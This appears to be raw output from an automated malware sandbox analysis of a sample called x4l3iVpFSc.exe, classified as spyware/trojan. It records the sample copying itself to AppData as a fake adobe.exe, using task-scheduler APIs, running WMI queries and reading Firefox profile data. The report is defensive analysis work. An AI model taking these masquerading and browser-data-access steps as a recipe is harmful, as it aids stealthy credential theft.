                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 10_2_0627697110_2_06276971
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 10_2_0629F61810_2_0629F618
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 10_2_0629F30810_2_0629F308
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 10_2_0629DD8010_2_0629DD80
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 10_2_0628001F10_2_0628001F
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 10_2_0628004010_2_06280040
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_011493D813_2_011493D8
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_0114A4F013_2_0114A4F0
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_0114A84013_2_0114A840
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_01146BF013_2_01146BF0
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_0114CC5713_2_0114CC57
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_01149FF013_2_01149FF0
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_0114D10F13_2_0114D10F
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_0114D0E513_2_0114D0E5
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_0114A4E113_2_0114A4E1
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_0114972013_2_01149720
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_0114A83013_2_0114A830
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_0114586213_2_01145862
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_0114589013_2_01145890
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_01142ADE13_2_01142ADE
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_01142B4813_2_01142B48
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_01146BE013_2_01146BE0
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_01142ADE13_2_01142ADE
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_0672112013_2_06721120
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_06722E3013_2_06722E30
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_06723EB813_2_06723EB8
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_0672389013_2_06723890
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_0672004013_2_06720040
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_0672111013_2_06721110
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_06722E3013_2_06722E30
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_0672318613_2_06723186
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_06722E2113_2_06722E21
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_06723EA913_2_06723EA9
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_06722E3013_2_06722E30
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_06723EB813_2_06723EB8
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_06733E7013_2_06733E70
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_0673C42813_2_0673C428
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_0673ECB013_2_0673ECB0
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_0673CA6013_2_0673CA60
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_0673A23013_2_0673A230
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_0673DB3813_2_0673DB38
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_06738B2013_2_06738B20
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_0673004013_2_06730040
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_0673194813_2_06731948
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_0673E66813_2_0673E668
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_0673BFE013_2_0673BFE0
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_0673A7CA13_2_0673A7CA
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_067314F813_2_067314F8
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_0673B4A013_2_0673B4A0
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_0673ECAF13_2_0673ECAF
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_0673150813_2_06731508
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_06736DE013_2_06736DE0
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_06736DD013_2_06736DD0
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_0673CA5013_2_0673CA50
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_06737A3013_2_06737A30
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_0673A22313_2_0673A223
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_06737A2A13_2_06737A2A
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_06739A0013_2_06739A00
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_067382E813_2_067382E8
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_067392A013_2_067392A0
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_0673929213_2_06739292
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_0673DB2913_2_0673DB29
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_067353A113_2_067353A1
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_0673BB9813_2_0673BB98
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_0673504813_2_06735048
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_0673000713_2_06730007
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_0673B0F813_2_0673B0F8
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_0673493813_2_06734938
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_0673193813_2_06731938
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_067A529813_2_067A5298
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_067A5B6013_2_067A5B60
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_067AEF1013_2_067AEF10
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_067A528113_2_067A5281
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_067A5B5113_2_067A5B51
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_014D93D814_2_014D93D8
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_014DA4F014_2_014DA4F0
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_014D972014_2_014D9720
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_014DA84014_2_014DA840
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_014D6BF014_2_014D6BF0
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_014DCC5714_2_014DCC57
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_014DAC3814_2_014DAC38
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_014D9FF014_2_014D9FF0
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_014DD10F14_2_014DD10F
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_014D311014_2_014D3110
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_014D31B414_2_014D31B4
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_014DD0E514_2_014DD0E5
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_014DA4E114_2_014DA4E1
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_014D548114_2_014D5481
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_014DA83014_2_014DA830
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_014D589014_2_014D5890
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_014D2B4814_2_014D2B48
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_014D2B3814_2_014D2B38
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_014D6BE014_2_014D6BE0
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_014DAC2914_2_014DAC29
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_06AD841414_2_06AD8414
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_06AD2E3014_2_06AD2E30
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_06AD4C8014_2_06AD4C80
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_06AD4A7014_2_06AD4A70
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_06AD112014_2_06AD1120
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_06AD3EB814_2_06AD3EB8
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_06AD389014_2_06AD3890
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_06AD004014_2_06AD0040
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_06AD2E3014_2_06AD2E30
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_06AD2E2114_2_06AD2E21
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_06AD4C8014_2_06AD4C80
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_06AD8B1F14_2_06AD8B1F
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_06AD318614_2_06AD3186
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_06AD2E3014_2_06AD2E30
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_06AD111014_2_06AD1110
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_06AD3EA914_2_06AD3EA9
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_06AD3EB814_2_06AD3EB8
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_06AD7A2814_2_06AD7A28
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_06AD7A2314_2_06AD7A23
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_06AECF1814_2_06AECF18
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_06AEECB014_2_06AEECB0
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_06AEC42814_2_06AEC428
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_06AEA23014_2_06AEA230
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_06AECA5014_2_06AECA50
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_06AE8B2014_2_06AE8B20
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_06AEDB3814_2_06AEDB38
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_06AE004014_2_06AE0040
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_06AE193814_2_06AE1938
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_06AEE66814_2_06AEE668
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_06AEBFE014_2_06AEBFE0
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_06AEA7CA14_2_06AEA7CA
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_06AEECA714_2_06AEECA7
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_06AEB4A014_2_06AEB4A0
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_06AE14F814_2_06AE14F8
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_06AE6DE014_2_06AE6DE0
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_06AE6DD014_2_06AE6DD0
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_06AE92A014_2_06AE92A0
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_06AE929214_2_06AE9292
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_06AE82E814_2_06AE82E8
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_06AE7A2614_2_06AE7A26
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_06AEA22314_2_06AEA223
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_06AE7A3014_2_06AE7A30
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_06AE9A0014_2_06AE9A00
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_06AE53A114_2_06AE53A1
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_06AEBB9814_2_06AEBB98
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_06AEDB2914_2_06AEDB29
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_06AEB0F814_2_06AEB0F8
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_06AE000614_2_06AE0006
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_06AE492814_2_06AE4928
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_06AE493814_2_06AE4938
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_06B5569014_2_06B55690
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_06B5528114_2_06B55281
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_06B55B5114_2_06B55B51
                Source: x4l3iVpFSc.exeStatic PE information: invalid certificate
                Source: x4l3iVpFSc.exe, 00000000.00000002.1460625473.00000000029E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs x4l3iVpFSc.exe
                Source: x4l3iVpFSc.exe, 00000000.00000000.1170513731.00000000005E7000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameLnhyowpy.exe< vs x4l3iVpFSc.exe
                Source: x4l3iVpFSc.exe, 00000000.00000002.1470767093.0000000003C53000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDlsgglor.dll" vs x4l3iVpFSc.exe
                Source: x4l3iVpFSc.exe, 00000000.00000002.1470767093.0000000003B6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamea9d26a1c-7dc5-441c-98a8-6dd01f6d79df.exe4 vs x4l3iVpFSc.exe
                Source: x4l3iVpFSc.exe, 00000000.00000002.1470767093.00000000039E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs x4l3iVpFSc.exe
                Source: x4l3iVpFSc.exe, 00000000.00000002.1470767093.00000000039E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs x4l3iVpFSc.exe
                Source: x4l3iVpFSc.exe, 00000000.00000002.1460625473.0000000002B95000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamea9d26a1c-7dc5-441c-98a8-6dd01f6d79df.exe4 vs x4l3iVpFSc.exe
                Source: x4l3iVpFSc.exe, 00000000.00000002.1477309607.0000000005DA0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs x4l3iVpFSc.exe
                Source: x4l3iVpFSc.exe, 00000000.00000002.1473020471.0000000004FD0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameDlsgglor.dll" vs x4l3iVpFSc.exe
                Source: x4l3iVpFSc.exe, 00000000.00000002.1476797367.0000000005CB0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs x4l3iVpFSc.exe
                Source: x4l3iVpFSc.exe, 00000000.00000002.1470767093.0000000003D72000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDlsgglor.dll" vs x4l3iVpFSc.exe
                Source: x4l3iVpFSc.exe, 00000000.00000002.1470767093.0000000003D72000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs x4l3iVpFSc.exe
                Source: x4l3iVpFSc.exe, 00000008.00000002.2434249895.00000000011E9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs x4l3iVpFSc.exe
                Source: x4l3iVpFSc.exeBinary or memory string: OriginalFilenameLnhyowpy.exe< vs x4l3iVpFSc.exe
                Source: x4l3iVpFSc.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: 0.2.x4l3iVpFSc.exe.5da0000.10.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                Source: 0.2.x4l3iVpFSc.exe.5da0000.10.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                Source: 0.2.x4l3iVpFSc.exe.5da0000.10.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                Source: 0.2.x4l3iVpFSc.exe.5da0000.10.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                Source: 0.2.x4l3iVpFSc.exe.39e5570.1.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                Source: 0.2.x4l3iVpFSc.exe.39e5570.1.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                Source: 0.2.x4l3iVpFSc.exe.39e5570.1.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                Source: 0.2.x4l3iVpFSc.exe.5da0000.10.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                Source: 0.2.x4l3iVpFSc.exe.5da0000.10.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                Source: 0.2.x4l3iVpFSc.exe.5da0000.10.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                Source: 0.2.x4l3iVpFSc.exe.3ea6e40.2.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                Source: 0.2.x4l3iVpFSc.exe.3ea6e40.2.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                Source: 0.2.x4l3iVpFSc.exe.3ea6e40.2.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                Source: 0.2.x4l3iVpFSc.exe.5da0000.10.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                Source: 0.2.x4l3iVpFSc.exe.5da0000.10.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.x4l3iVpFSc.exe.39e5570.1.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                Source: 0.2.x4l3iVpFSc.exe.39e5570.1.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                Source: 0.2.x4l3iVpFSc.exe.39e5570.1.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                Source: 0.2.x4l3iVpFSc.exe.39e5570.1.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.x4l3iVpFSc.exe.3ea6e40.2.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                Source: 0.2.x4l3iVpFSc.exe.39e5570.1.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                Source: 0.2.x4l3iVpFSc.exe.5da0000.10.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                Source: 0.2.x4l3iVpFSc.exe.3ea6e40.2.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.x4l3iVpFSc.exe.3ea6e40.2.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/2@2/2
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeFile created: C:\Users\user\AppData\Roaming\adobe\adobe.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMutant created: NULL
                Source: x4l3iVpFSc.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: x4l3iVpFSc.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: x4l3iVpFSc.exeVirustotal: Detection: 63%
                Source: x4l3iVpFSc.exeReversingLabs: Detection: 60%
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeFile read: C:\Users\user\Desktop\x4l3iVpFSc.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\x4l3iVpFSc.exe "C:\Users\user\Desktop\x4l3iVpFSc.exe"
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeProcess created: C:\Users\user\Desktop\x4l3iVpFSc.exe "C:\Users\user\Desktop\x4l3iVpFSc.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeProcess created: C:\Users\user\Desktop\x4l3iVpFSc.exe "C:\Users\user\Desktop\x4l3iVpFSc.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeSection loaded: wtsapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeSection loaded: windows.storage.dllJump to behavior
